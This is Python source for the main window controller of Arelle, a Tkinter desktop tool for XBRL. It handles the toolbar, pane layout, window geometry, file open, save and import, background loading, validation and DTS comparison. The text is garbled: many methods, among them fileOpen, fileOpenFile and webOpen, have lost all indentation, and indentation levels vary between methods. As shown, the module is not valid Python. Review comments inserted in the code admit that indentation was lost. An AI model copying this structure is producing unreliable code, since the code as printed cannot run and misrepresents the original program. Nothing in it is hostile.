        self.validateTooltipText = StringVar()
        for image, command, toolTip, statusMsg in (
                #("images/toolbarNewFile.gif", self.fileNew),
                ("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
                ("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
                ("toolbarSaveFile.gif", self.fileSave, _("Save file"), _("Saves currently selected local XBRL file")),
                ("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
                (None,None,None,None),
                ("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
                (None,None,None,None),
                ("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
                ("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
                (None,None,None,None),
                ("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
                #(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
                #          ), self.logClear, _("Find options"), _("Select of find options")),
                ):
            if command is None:
                # None command means a visual separator between button groups
                tbControl = Separator(toolbar, orient=VERTICAL)
                tbControl.grid(row=0, column=menubarColumn, padx=6)
            elif isinstance(image, Combobox):
                tbControl = image
                tbControl.grid(row=0, column=menubarColumn)
            else:
                image = os.path.join(self.imagesDir, image)
                try:
                    image = PhotoImage(file=image)
                    # keep a reference so Tk does not garbage-collect the image
                    self.toolbar_images.append(image)
                    tbControl = Button(toolbar, image=image, command=command, style="Toolbutton")
                    tbControl.grid(row=0, column=menubarColumn)
                except TclError as err:
                    print(err)
            if isinstance(toolTip,StringVar):
                ToolTip(tbControl, textvariable=toolTip, wraplength=240)
            else:
                ToolTip(tbControl, text=toolTip)
            menubarColumn += 1
        for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
            toolbarExtender(self, toolbar)
        toolbar.grid(row=0, column=0, sticky=(N, W))

        # --- paned windows holding the three view notebooks ---
        paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
        paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
        paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
        paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
        paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
        paneWinTopBtm.add(paneWinLeftRt)
        self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
        self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
        paneWinLeftRt.add(self.tabWinTopLeft)
        self.tabWinTopRt = Notebook(paneWinLeftRt)
        self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
        self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
        paneWinLeftRt.add(self.tabWinTopRt)
        self.tabWinBtm = Notebook(paneWinTopBtm)
        self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
        self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
        paneWinTopBtm.add(self.tabWinBtm)

        # --- message log view with context menu; WinMainLogHandler is
        #     defined elsewhere in this module ---
        from arelle import ViewWinList
        self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
        self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
        logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
        logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
        logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
        if self.hasClipboard:
            logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))

        # --- grid weights so panes resize sensibly ---
        windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
        windowFrame.columnconfigure(0, weight=999)
        windowFrame.columnconfigure(1, weight=1)
        windowFrame.rowconfigure(0, weight=1)
        windowFrame.rowconfigure(1, weight=999)
        windowFrame.rowconfigure(2, weight=1)
        paneWinTopBtm.columnconfigure(0, weight=1)
        paneWinTopBtm.rowconfigure(0, weight=1)
        paneWinLeftRt.columnconfigure(0, weight=1)
        paneWinLeftRt.rowconfigure(0, weight=1)
        self.tabWinTopLeft.columnconfigure(0, weight=1)
        self.tabWinTopLeft.rowconfigure(0, weight=1)
        self.tabWinTopRt.columnconfigure(0, weight=1)
        self.tabWinTopRt.rowconfigure(0, weight=1)
        self.tabWinBtm.columnconfigure(0, weight=1)
        self.tabWinBtm.rowconfigure(0, weight=1)
        window = self.parent.winfo_toplevel()
        window.columnconfigure(0, weight=1)
        window.rowconfigure(0, weight=1)

        # --- restore window geometry, clamping the saved values on screen ---
        priorState = self.config.get('windowState')
        screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
        screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
        if priorState == "zoomed":
            self.parent.state("zoomed")
            w = screenW
            h = screenH
        else:
            priorGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",self.config.get('windowGeometry'))
            if priorGeometry and priorGeometry.lastindex >= 4:
                try:
                    w = int(priorGeometry.group(1))
                    h = int(priorGeometry.group(2))
                    x = int(priorGeometry.group(3))
                    y = int(priorGeometry.group(4))
                    if x + w > screenW:
                        if w < screenW:
                            x = screenW - w
                        else:
                            x = 0
                            w = screenW
                    elif x < 0:
                        x = 0
                        if w > screenW:
                            w = screenW
                    if y + h > screenH:
                        if y < screenH:
                            y = screenH - h
                        else:
                            y = 0
                            h = screenH
                    elif y < 0:
                        y = 0
                        if h > screenH:
                            h = screenH
                    self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
                except:
                    # malformed saved geometry; keep Tk's default placement
                    pass
        # set top/btm divider
        topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
        if 10 < topLeftW < w - 60:
            self.tabWinTopLeft.config(width=topLeftW)
        if 10 < topLeftH < h - 60:
            self.tabWinTopLeft.config(height=topLeftH)

        self.parent.title(_("arelle - Unnamed"))
        self.logFile = None
        self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
        self.uiThreadChecker(self.statusbar) # start background queue
        if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
            self.validateDisclosureSystem.set(False)
            self.modelManager.validateDisclosureSystem = False
        self.setValidateTooltipText()
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 1)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
def okayToContinue(self):
if not self.dirty:
return True
reply = tkinter.messagebox.askyesnocancel(
_("arelle - Unsaved Changes"),
_("Save unsaved changes?"),
parent=self.parent)
if reply is None:
return False
if reply:
return self.fileSave()
return True
    def fileSave(self, view=None, fileType=None, *ignore):
        """Save the content of the currently selected view pane.

        view: the view to save; defaults to self.currentView.
        fileType: optional hint ("html", "xml", "xbrl") narrowing the save
            dialog choices for rendered-grid views.
        Returns True on save (or handled failure), False when the user
        cancels the file dialog; warns when nothing saveable is selected.
        """
        if view is None:
            view = getattr(self, "currentView", None)
        if view is not None:
            modelXbrl = view.modelXbrl
            if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
                initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
                if fileType in ("html", "xml", None):
                    if fileType == "html":
                        filename = self.uiFileDialog("save",
                                title=_("arelle - Save HTML-rendered Table"),
                                initialdir=initialdir,
                                filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
                                defaultextension=".html")
                    elif fileType == "xml":
                        filename = self.uiFileDialog("save",
                                title=_("arelle - Save Table Layout Infoset"),
                                initialdir=initialdir,
                                filetypes=[(_("XML file .xml"), "*.xml")],
                                defaultextension=".xml")
                    else: # ask file type
                        filename = self.uiFileDialog("save",
                                title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
                                initialdir=initialdir,
                                filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
                                defaultextension=".html")
                        # an instance extension means save the instance, not the rendering
                        if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
                            view.saveInstance(filename)
                            return True
                    if not filename:
                        return False
                    try:
                        ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
                    except (IOError, EnvironmentError) as err:
                        tkinter.messagebox.showwarning(_("arelle - Error"),
                                        _("Failed to save {0}:\n{1}").format(
                                        filename, err),
                                        parent=self.parent)
                    return True
                elif fileType == "xbrl":
                    # NOTE(review): returns the dialog result itself rather
                    # than saving — confirm this is the intended behavior
                    return self.uiFileDialog("save",
                            title=_("arelle - Save Instance"),
                            initialdir=initialdir,
                            filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
                            defaultextension=".xbrl")
            elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
                # testcase results are exported as CSV
                filename = self.uiFileDialog("save",
                        title=_("arelle - Save Test Results"),
                        initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
                        filetypes=[(_("CSV file"), "*.csv")],
                        defaultextension=".csv")
                if not filename:
                    return False
                try:
                    ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
                except (IOError, EnvironmentError) as err:
                    tkinter.messagebox.showwarning(_("arelle - Error"),
                                    _("Failed to save {0}:\n{1}").format(
                                    filename, err),
                                    parent=self.parent)
                return True
            elif isinstance(view, ViewWinTree.ViewTree):
                # generic tree views: role types, concepts, or relationship sets
                filename = self.uiFileDialog("save",
                        title=_("arelle - Save {0}").format(view.tabTitle),
                        initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
                        filetypes=[(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
                        defaultextension=".csv")
                if not filename:
                    return False
                try:
                    if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
                        ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
                    elif isinstance(view, ViewWinConcepts.ViewConcepts):
                        ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
                    else:
                        ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
                except (IOError, EnvironmentError) as err:
                    tkinter.messagebox.showwarning(_("arelle - Error"),
                                    _("Failed to save {0}:\n{1}").format(
                                    filename, err),
                                    parent=self.parent)
                return True
            elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
                # save the formula processor's output instance document
                filename = self.uiFileDialog("save",
                        title=_("arelle - Save Formula Result Instance Document"),
                        initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
                        filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
                        defaultextension=".xml")
                if not filename:
                    return False
                try:
                    from arelle import XmlUtil
                    with open(filename, "w") as fh:
                        XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
                    self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
                except (IOError, EnvironmentError) as err:
                    tkinter.messagebox.showwarning(_("arelle - Error"),
                                    _("Failed to save {0}:\n{1}").format(
                                    self.filename, err),
                                    parent=self.parent)
                return True
        # no saveable view selected (or view is None)
        tkinter.messagebox.showwarning(_("arelle - Save what?"),
                _("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
                parent=self.parent)
        '''
        if self.filename is None:
            filename = self.uiFileDialog("save",
                    title=_("arelle - Save File"),
                    initialdir=".",
                    filetypes=[(_("Xbrl file"), "*.x*")],
                    defaultextension=".xbrl")
            if not filename:
                return False
            self.filename = filename
            if not self.filename.endswith(".xbrl"):
                self.filename += ".xbrl"
        try:
            with open(self.filename, "wb") as fh:
                pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
            self.dirty = False
            self.uiShowStatus(_("Saved {0} items to {1}").format(
                                len(self.data),
                                self.filename), clearAfter=5000)
            self.parent.title(_("arelle - {0}").format(
                            os.path.basename(self.filename)))
        except (EnvironmentError, pickle.PickleError) as err:
            tkinter.messagebox.showwarning(_("arelle - Error"),
                            _("Failed to save {0}:\n{1}").format(
                            self.filename, err),
                            parent=self.parent)
        return True;
        '''
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.EFM)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filename:
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,importToDTS,selectTopView))
thread.daemon = True
thread.start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,False,False))
thread.daemon = True
thread.start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
    def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
        """Load (or import) an XBRL filesource on this background thread,
        log timing, then queue view construction onto the UI thread.

        filesource: the FileSource to load.
        importToDTS: True to import into the already-open model instead of
            loading a fresh one.
        selectTopView: forwarded to showLoadedXbrl for tab selection.
        """
        startedAt = time.time()
        try:
            if importToDTS:
                action = _("imported")
                profileStat = "import"
                modelXbrl = self.modelManager.modelXbrl
                if modelXbrl:
                    ModelDocument.load(modelXbrl, filesource.url)
                    modelXbrl.relationshipSets.clear() # relationships have to be re-cached
            else:
                action = _("loaded")
                profileStat = "load"
                modelXbrl = self.modelManager.load(filesource, _("views loading"))
        except ModelDocument.LoadingException:
            self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
            return
        except Exception as err:
            msg = _("Exception loading {0}: {1}, at {2}").format(
                filesource.url,
                err,
                traceback.format_tb(sys.exc_info()[2]))
            # not sure if message box can be shown from background thread
            # tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
            self.addToLog(msg);
            self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
            return
        if modelXbrl and modelXbrl.modelDocument:
            statTime = time.time() - startedAt
            modelXbrl.profileStat(profileStat, statTime)
            self.addToLog(format_string(self.modelManager.locale,
                                        _("%s in %.2f secs"),
                                        (action, statTime)))
            if modelXbrl.hasTableRendering:
                self.showStatus(_("Initializing table rendering"))
                RenderingEvaluator.init(modelXbrl)
            self.showStatus(_("{0}, preparing views").format(action))
            self.waitForUiThreadQueue() # force status update
            # view construction must happen on the UI thread
            self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
        else:
            self.addToLog(format_string(self.modelManager.locale,
                                        _("not successfully %s in %.2f secs"),
                                        (action, time.time() - startedAt)))
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
    """Create the standard set of GUI views for a loaded/imported model.

    Runs on the UI thread.  `attach` True means the model replaced or
    extended a prior one, so that model's views are closed first.  Which
    views are created depends on the document type (testcases, versioning
    report, RSS feed, or a regular schema/linkbase/instance).
    """
    startedAt = time.time()
    currentAction = "setting title"  # tracked so the exception handler can say where it failed
    topView = None
    self.currentView = None
    try:
        if attach:
            modelXbrl.closeViews()
        self.parent.title(_("arelle - {0}").format(
            os.path.basename(modelXbrl.modelDocument.uri)))
        self.setValidateTooltipText()
        if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
            currentAction = "tree view of tests"
            ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
            topView = modelXbrl.views[-1]
        elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
            currentAction = "view of versioning report"
            ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
            from arelle.ViewWinDiffs import ViewWinDiffs
            ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
        elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
            currentAction = "view of RSS feed"
            ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
            topView = modelXbrl.views[-1]
        else:
            # regular schema/linkbase/instance: open the full suite of views
            if modelXbrl.hasTableIndexing:
                currentAction = "table index view"
                ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
                    treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
            '''
            elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
                not modelXbrl.hasTableRendering):
                currentAction = "facttable ELRs view"
                ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
                    treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
            '''
            currentAction = "tree view of tests"
            ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
            currentAction = "view of concepts"
            ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
            if modelXbrl.hasTableRendering: # show rendering grid even without any facts
                ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
                if topView is None: topView = modelXbrl.views[-1]
            if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
                currentAction = "table view of facts"
                if not modelXbrl.hasTableRendering: # table view only if not grid rendered view
                    ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
                    if topView is None: topView = modelXbrl.views[-1]
                currentAction = "tree/list of facts"
                ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
                if topView is None: topView = modelXbrl.views[-1]
            if modelXbrl.hasFormulae:
                currentAction = "formulae view"
                ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
                if topView is None: topView = modelXbrl.views[-1]
            currentAction = "presentation linkbase view"
            ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
            if topView is None: topView = modelXbrl.views[-1]
            currentAction = "calculation linkbase view"
            ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
            currentAction = "dimensions relationships view"
            ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
            if modelXbrl.hasTableRendering:
                currentAction = "rendering view"
                ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
            # user-configured arcrole-group views (from saved configuration)
            for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
                if XbrlConst.arcroleGroupDetect in arcroles:
                    currentAction = name + " view"
                    ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
        # NOTE(review): property grid placed at this level (all document types);
        # original indentation was lost in extraction — confirm against upstream.
        currentAction = "property grid"
        ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
        currentAction = "log view creation time"
        viewTime = time.time() - startedAt
        modelXbrl.profileStat("view", viewTime)
        self.addToLog(format_string(self.modelManager.locale,
                                    _("views %.2f secs"), viewTime))
        if selectTopView and topView:
            topView.select()
        self.currentView = topView
        for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
            xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
    except Exception as err:
        msg = _("Exception preparing {0}: {1}, at {2}").format(
            currentAction,
            err,
            traceback.format_tb(sys.exc_info()[2]))
        tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
        self.addToLog(msg);
    self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
    """Replace the prior formula-output instance view with the new one (UI thread)."""
    currentAction = "closing prior formula output instance"
    try:
        if priorOutputInstance: # if has UI must close on UI thread, not background thread
            priorOutputInstance.close()
        currentAction = "showing resulting formula output instance"
        if currentOutputInstance:
            ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
    except Exception as err:
        msg = _("Exception {0}: {1}, at {2}").format(
            currentAction,
            err,
            traceback.format_tb(sys.exc_info()[2]))
        tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
        self.addToLog(msg);
    self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
    """Log the active model's collected profiling statistics, if enabled."""
    mdlXbrl = self.modelManager.modelXbrl
    if not mdlXbrl:
        return
    if self.modelManager.collectProfileStats:
        mdlXbrl.logProfileStats()
def clearProfileStats(self):
    """Reset the active model's accumulated profile statistics, if enabled."""
    mdlXbrl = self.modelManager.modelXbrl
    if not (mdlXbrl and self.modelManager.collectProfileStats):
        return
    mdlXbrl.profileStats.clear()
def fileClose(self, *ignore):
    """Close the current model (after confirming unsaved work) and reset the title."""
    if self.okayToContinue():
        self.modelManager.close()
        self.parent.title(_("arelle - Unnamed"))
        self.setValidateTooltipText()
def validate(self):
    """Kick off validation of the current model on a daemon worker thread.

    Refuses (with a warning dialog) when disclosure-system checks are
    requested but no disclosure system has been selected.
    """
    modelXbrl = self.modelManager.modelXbrl
    if modelXbrl:
        if (modelXbrl.modelManager.validateDisclosureSystem and
                not modelXbrl.modelManager.disclosureSystem.selection):
            tkinter.messagebox.showwarning(_("arelle - Warning"),
                _("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
                parent=self.parent)
        else:
            if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
                # let testcase plugins prepare before validation begins
                for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
                    pluginXbrlMethod(self, None, modelXbrl)
            thread = threading.Thread(target=lambda: self.backgroundValidate())
            thread.daemon = True
            thread.start()
def backgroundValidate(self):
    """Worker-thread half of validate(): run validation, then update the UI."""
    startedAt = time.time()
    modelXbrl = self.modelManager.modelXbrl
    priorOutputInstance = modelXbrl.formulaOutputInstance
    modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
    self.modelManager.validate()
    self.addToLog(format_string(self.modelManager.locale,
                                _("validated in %.2f secs"),
                                time.time() - startedAt))
    if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
        # swap formula output instance views on the UI thread
        self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
    self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
    """Prompt for a versioning-report file and compare the two loaded DTSes.

    Returns False when preconditions fail (not exactly two DTSes loaded, or
    no file chosen); otherwise starts the comparison on a daemon thread.
    """
    countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
    if countLoadedDTSes != 2:
        tkinter.messagebox.showwarning(_("arelle - Warning"),
            _("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
            parent=self.parent)
        return False
    versReportFile = self.uiFileDialog("save",
        title=_("arelle - Save Versioning Report File"),
        initialdir=self.config.setdefault("versioningReportDir","."),
        filetypes=[(_("Versioning report file"), "*.xml")],
        defaultextension=".xml")
    if not versReportFile:
        return False
    # remember the directory for the next save dialog
    self.config["versioningReportDir"] = os.path.dirname(versReportFile)
    self.saveConfig()
    thread = threading.Thread(target=lambda: self.backgroundCompareDTSes(versReportFile))
    thread.daemon = True
    thread.start()
def backgroundCompareDTSes(self, versReportFile):
    """Worker-thread half of compareDTSes(): build the report, then show it."""
    startedAt = time.time()
    modelVersReport = self.modelManager.compareDTSes(versReportFile)
    if modelVersReport and modelVersReport.modelDocument:
        self.addToLog(format_string(self.modelManager.locale,
                                    _("compared in %.2f secs"),
                                    time.time() - startedAt))
        # views must be opened on the UI thread
        self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
    """Close both compared DTS's views, then show the versioning report."""
    reportDoc = modelVersReport.modelDocument
    for comparedDTS in (reportDoc.fromDTS, reportDoc.toDTS):
        comparedDTS.closeViews()
    self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
    """Load a pickled list of item names from *filename* into the list box.

    On success, sorted names fill the list box and the window title / status
    bar are updated; on I/O or unpickling failure a warning dialog is shown.
    """
    self.filename = filename
    self.listBox.delete(0, END)
    self.dirty = False
    try:
        with open(self.filename, "rb") as fh:
            # NOTE(review): pickle is unsafe on untrusted files — only load
            # files this application wrote itself.
            self.data = pickle.load(fh)
        for name in sorted(self.data, key=str.lower):
            self.listBox.insert(END, name)
        self.showStatus(_("Loaded {0} items from {1}").format(
            self.listBox.size(),  # fixed: was self.listbox — AttributeError at runtime
            self.filename), clearAfter=5000)
        self.parent.title(_("arelle - {0}").format(
            os.path.basename(self.filename)))
    except (EnvironmentError, pickle.PickleError) as err:
        tkinter.messagebox.showwarning(_("arelle - Error"),
            _("Failed to load {0}\n{1}").format(
                self.filename,
                err),
            parent=self.parent)
